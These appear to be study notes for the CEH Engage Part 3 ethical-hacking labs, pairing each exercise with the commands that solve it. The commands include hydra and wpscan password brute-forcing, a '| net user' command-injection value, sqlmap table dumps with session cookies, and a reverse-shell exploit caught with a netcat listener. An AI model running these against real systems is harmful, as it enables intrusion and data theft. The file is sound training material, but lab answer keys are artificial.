3️⃣CEH Engage Part 3
You have been assigned a task to perform a clickjacking test on www.certifiedhacker.com that the CEHORG members widely use. Find out whether the site is vulnerable to clickjacking.
GhostEye


Nikto

Perform an HTTP-recon on www.certifiedhacker.com and find out the version of Nginx used by the web server.
BillCipher

Whatweb

An FTP site is hosted on a machine in the CEHORG network. Crack the FTP credentials, obtain the “flag.txt” file and determine the content in the file.
nmap -p 21 172.16.0.0/24
nmap -p 21 10.10.10.0/24
nmap -p 21 192.168.0.0/24
hydra -L <username.txt> -P <password.txt> ftp://172.16.0.12



Perform web application reconnaissance on movies.cehorg.com and find out the HTTP server used by the web application.
Whatweb
whatweb movies.cehorg.com

Nmap


Identify the load balancing service used by eccouncil.org.
lbd eccouncil.org
-> cloudflare

Identify the Content Management System used by www.cehorg.com.
wig www.cehorg.com

Perform a bruteforce attack on www.cehorg.com and find the password of user adam.
wpscan --url http://cehorg.com/wp-login.php -U <username.txt> -P <password.txt>


Perform parameter tampering on movies.cehorg.com and find out the user for id 1003.


You have identified a vulnerable web application on a Linux server at port 8080. Exploit the web application vulnerability, gain access to the server and enter the content of RootFlag.txt as the answer.
nmap -p 8080 172.16.0.0/24
nmap -p 8080 10.10.10.0/24
nmap -p 8080 192.168.0.0/24
Extract and set up the JDK
tar -xf jdk-8u202-linux-x64.tar.gz
mv jdk1.8.0_202 /usr/bin
Update the JDK path in the poc.py file
Create a Netcat Listener
nc -lvp 9001
Create a Payload
python3 poc.py --userip 10.10.1.13 --webport 8080 --lport 9001




Perform command injection attack on 10.10.10.25 and find out how many user accounts are registered with the machine. Note: Exclude admin/Guest user
| net user

A file named Hash.txt has been uploaded through DVWA (http://10.10.10.25:8080/DVWA). The file is located in the directory mentioned below. Access the file and crack the MD5 hash to reveal the original message; enter the content after cracking the hash. You can log into the DVWA using the following credentials.
Note: Username- admin; Password- password
Path: C:\wamp64\www\DVWA\hackable\uploads\Hash.txt
Hint: Use “type” command to view the file. Use the following link to decrypt the hash- https://hashes.com/en/decrypt/hash


Perform Banner grabbing on the web application movies.cehorg.com and find out the ETag of the respective target machine.

Perform Web Crawling on the web application movies.cehorg.com and identify the number of live png files in images folder.

Perform XSS vulnerability test on www.cehorg.com and identify whether the application is vulnerable to attack or not. (Yes/No).
-> No
PwnXSS
python3 pwnxss.py -u http://www.cehorg.com
OWASP ZAP

Perform a SQL Injection attack on movies.cehorg.com and find out the number of users available in the database. Use Jason/welcome as login credentials.
Get Database
sqlmap -u "http://sometestdb.to/view?id=123&Submit=Submit#" --cookie="PHPSESSID=e3f9231953973ace4acb63cfde2ccc08; security=low" --dbs
Get Tables
sqlmap -u "http://sometestdb.to/view?id=123&Submit=Submit#" --cookie="PHPSESSID=e3f9231953973ace4acb63cfde2ccc08; security=low" -D moviescope --tables
Get number of Users available
sqlmap -u "http://sometestdb.to/view?id=123&Submit=Submit#" --cookie="PHPSESSID=e3f9231953973ace4acb63cfde2ccc08; security=low" -D moviescope -T UserProfile --count
Dump Table Data
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<Cookie Value>" -D moviescope -T User_Login --dump
Dump Databases
sqlmap -u "http://sometestdb.to/view?id=123&Submit=Submit#" --cookie="PHPSESSID=e3f9231953973ace4acb63cfde2ccc08; security=low" -D moviescope --dump-all



CEHORG suspects a possible session hijacking attack on a machine in its network. The organisation has retained the network traffic data for the session at C:\Users\Admin\Documents in the EH Workstation – 2 as sniffsession.pcap. You have been assigned a task to perform an analysis and find out the protocol that has been used for sniffing on its network.
